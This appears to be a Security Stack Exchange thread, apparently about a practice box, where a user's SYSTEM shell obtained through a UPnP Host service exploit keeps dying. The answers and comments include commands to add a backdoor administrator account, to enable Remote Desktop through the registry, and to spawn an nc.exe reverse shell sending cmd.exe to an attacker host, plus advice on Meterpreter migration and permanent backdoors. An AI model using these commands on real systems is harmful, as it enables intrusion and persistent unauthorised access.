6

I have a user restricted shell and I used a host upnpn exploit which gives me root access to nc.exe. I am able to get a shell as SYSTEM but it dies after 30 seconds due to the service being unrecognised and then terminates. Within this time, what can I do to get back another system shell.

Ive tried adding another user as admin but do not know how to switch to that user. I also want to avoid making my current user as admin as other people are attacking the same box

I can use metrepeter to migrate to another process but I would like to do this more mnaually and am looking for a simpler solution

Anderson
  • 475
  • 6
  • 12
  • This seems difficult to answer knowing little about the scenario. But if you want to maintain access can’t you install some permanent backdoor when you’re on to allow you to gain access using that instead? Again I don’t know the scenario but that seems a logical next step. – ISMSDEV Oct 25 '17 at 20:16
  • Kill the thing that kills services? – billc.cn Nov 01 '17 at 18:30

2 Answers2

5

If I'm reading this correctly, you changed a windows service, UPNPHost, to use a different executable than it shipped with, right? If so, the process dies because it doesn't respond correctly to the task host, so it gets killed by the system.

Ive tried adding another user as admin but do not know how to switch to that user.

You can switch using Remote Desktop. Anything that gets spawned by nc.exe will likely be killed immediately alongside it.

I presume this is how you added the new user as admin? 

net user anderson cooper /add && net localgroup administrators anderson /add

Method 1: Remote Desktop

Try to RDP into the machine with the username anderson, and the password cooper. If RDP is not open, enable it:

reg add "HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Terminal Server" /v fDenyTSConnections /t REG_DWORD /d 0 /f

Method 2: Meterpreter Migration

Alternatively, you can upload a meterpreter shell and use that instead of plain nc, and then quickly migrate to another process so the shell continues to operate.

Mark Buffalo
  • 22,498
  • 8
  • 74
  • 91
4

I have found on occasion using the reverse shell to execute another nc.exe reverse shell back to your attack box before the service dies keeps the initial service from crashing. Then use the second reverse shell to continue. Hope it works for you, good luck!

countrhack
  • 466
  • 3
  • 7
  • In this situation, it's probably a Windows XP box (given the vulnerability he described). I've tried this in the past as well, and it still killed the other process since it's a child of the parent that gets offed by the system. Not sure it would work in his situation. – Mark Buffalo Oct 25 '17 at 21:47
  • 3
    Suprisingly, it works, I could `nc.exe -nv IP PORT -e C:\WINDOWS\System32\cmd.exe` on the SYSTEM shell and it still remained after it died. So definitely worth trying. However, I do prefer the RDP one as its more reliable and what I was trying to get by creating an administrator – Anderson Oct 25 '17 at 22:18